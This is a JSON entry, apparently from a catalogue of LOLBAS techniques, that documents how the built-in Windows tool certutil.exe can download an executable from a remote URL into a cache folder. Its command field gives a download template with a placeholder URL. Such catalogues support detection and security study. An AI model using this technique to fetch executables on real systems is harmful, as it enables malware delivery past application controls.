{
  "id": "lolbas-certutil-exe-download-3",
  "name": "LOLBAS · Certutil.exe (Download) #3",
  "command": "certutil.exe -URL {REMOTEURL:.exe}",
  "description": "Download and save an executable to `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>`.",
  "platform": "windows",
  "tags": [
    "lolbas",
    "certutil",
    "download"
  ],
  "source": "lolbas",
  "source_url": "https://lolbas-project.github.io/lolbas/Certutil/",
  "upstream_id": "Certutil.exe/Download/2",
  "category": "lolbas",
  "subcategory": "download",
  "references": [
    {
      "title": "LOLBAS — Certutil.exe",
      "url": "https://lolbas-project.github.io/lolbas/Certutil/"
    }
  ]
}
